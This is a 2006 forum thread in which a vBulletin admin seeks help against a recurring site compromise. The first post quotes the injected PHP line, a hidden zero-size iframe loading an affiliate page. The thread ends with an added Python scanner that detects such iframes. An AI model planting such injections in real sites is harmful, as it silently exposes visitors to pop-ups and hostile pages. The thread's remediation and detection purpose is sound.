  #1  
Old 08-01-2006, 07:51 PM
gbechtel gbechtel is offline
 
Join Date: Aug 2005
Posts: 75
Forum keeps getting hacked

I have a slight problem with an affiliate hacker. This lil twit modifies index.php, forumdisplay.php and showthread.php with the following code.

PHP Code:
echo "<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>";
It is usually placed at the bottom of the PHP file, like in forumdisplay.php:

PHP Code:
$show['forumsearch'] = iif (!$show['search_engine'] AND $forumperms & $vbulletin->bf_ugp_forumpermissions['cansearch'] AND $vbulletin->options['enablesearches'], true, false);
$show['forumslist'] = iif ($forumshown, true, false);
$show['stickies'] = iif ($threadbits_sticky != '', true, false);
echo "<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>";

($hook = vBulletinHook::fetch_hook('forumdisplay_complete')) ? eval($hook) : false;
The code messes up the template and creates a number of pop-ups.

It's simple enough to fix but I want to prevent it from happening again, seems every three days or so it is back.

Can I just chmod these files or will that mess up the board even more?

Thanks,
Gil

http://www.masscops.com/forums/police_portal_index.php?
#2
Old 08-01-2006, 08:41 PM
davidw davidw is offline

Join Date: Jul 2005
Location: Arkansas
Posts: 2,815

You should be able to chmod them 644 I believe
#3
Old 08-01-2006, 08:49 PM
bondjetta bondjetta is offline

Join Date: Sep 2004
Location: chicago
Posts: 111

Quote:
Originally Posted by christianb
You should be able to chmod them 644 I believe
Mine are 644'd and I'm showing similar signs of this same dude on both AutomotiveArena.com and WorkSafeBoredom.com
#4
Old 08-01-2006, 09:12 PM
gbechtel gbechtel is offline

Join Date: Aug 2005
Posts: 75

Yeah mine are already 644 also. Would 444 be an option?

Gonna try it and see what happens.

UPDATE:

Ok the 444 seems to be working for the time, don't know if the lil twit has tried it again or not but how was he able to do this in the first place?

I am not a security expert by any means but I think my vB is pretty secure. (renamed admin folders, htaccess etc...)

Is this some type of mysql injection or something?
#5
Old 08-04-2006, 07:54 PM
gbechtel gbechtel is offline

Join Date: Aug 2005
Posts: 75

The chmod 444 did not stop the lil twit.

On top of that the files that I did a chmod on were reverted back to 644.

Another interesting item, today just before I got hacked I had a new user join the forum.

IP Address used was 201.17.220.203

Quote:
There is a new user, bunda at MassCops - Massachusetts Law Enforcement Network

To view their profile, go here:

http://www.masscops.com/forums/member.php?u=4212

Email Address : soauker@gmail.com
Birthday :
Is there any way I can stop this guy?
#6
Old 08-04-2006, 07:59 PM
davidw davidw is offline

Join Date: Jul 2005
Location: Arkansas
Posts: 2,815

IMO, he gave himself away (the assumption it is a he). If it were me, I would block the whole HOST IP range in the vbulletin and if you have a firewall, add it to the firewall.
#7
Old 08-04-2006, 08:25 PM
gbechtel gbechtel is offline

Join Date: Aug 2005
Posts: 75

Server co. says he is getting in through the impex directory....
#8
Old 08-04-2006, 08:40 PM
davidw davidw is offline

Join Date: Jul 2005
Location: Arkansas
Posts: 2,815

Remove impex off your system if it is no longer in use.

http://www.vbulletin.com/docs/html/impex_cleanup
#9
Old 08-04-2006, 08:44 PM
gbechtel gbechtel is offline

Join Date: Aug 2005
Posts: 75

already done, hope that was it...
#10
Old 08-04-2006, 08:45 PM
davidw davidw is offline

Join Date: Jul 2005
Location: Arkansas
Posts: 2,815

Don't forget to ban his IP addresses though :P
Reply With Quote
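
A way to find every file carrying the kind of line quoted in the first post, written as an added example that is not part of the thread: it flags PHP files containing a zero-size iframe and reports each file's mode and modification time, so reverted permissions and the time of the change are visible at a glance. The function names, the constructed sample and its placeholder URL are assumptions made for the example.

```python
import os
import re
import stat
import sys

# Any <iframe ...> tag, including one split across lines.
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
# width=0 or height=0, quoted or bare; \b keeps marginwidth=0 from matching.
ZERO_DIM = re.compile(r"\b(?:width|height)\s*=\s*[\"']?0(?:px)?[\"'\s>]", re.I)
SRC = re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)

# Constructed sample modelled on the injected line; the URL is a placeholder.
SAMPLE = (
    "<?php\n"
    "$show['stickies'] = iif ($threadbits_sticky != '', true, false);\n"
    "echo \"<html><iframe width=0 height=0 frameborder=0 "
    "src='http://tracker.example/portal/index.php?aff=x' "
    "marginwidth=0 scrolling=no></iframe><html>\";\n"
)

def find_hidden_iframes(text):
    """Return [(line_number, src)] for each zero-size iframe in text."""
    hits = []
    for m in IFRAME.finditer(text):
        if ZERO_DIM.search(m.group(0)):
            src = SRC.search(m.group(0))
            line = text.count("\n", 0, m.start()) + 1
            hits.append((line, src.group(1) if src else ""))
    return hits

def scan_tree(root):
    """Report every .php file under root that carries a hidden iframe."""
    report = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(f for f in files if f.endswith(".php")):
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                text = fh.read().decode("utf-8", "replace")
            hits = find_hidden_iframes(text)
            if hits:
                st = os.stat(path)
                mode = oct(stat.S_IMODE(st.st_mode))
                report.append((path, mode, int(st.st_mtime), hits))
    return report

if __name__ == "__main__":
    for path, mode, mtime, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(mode, mtime, path, hits)
```

Run it against the forum root; the modification times it prints can be matched against the web server's access log for the same minute to see which request rewrote the file.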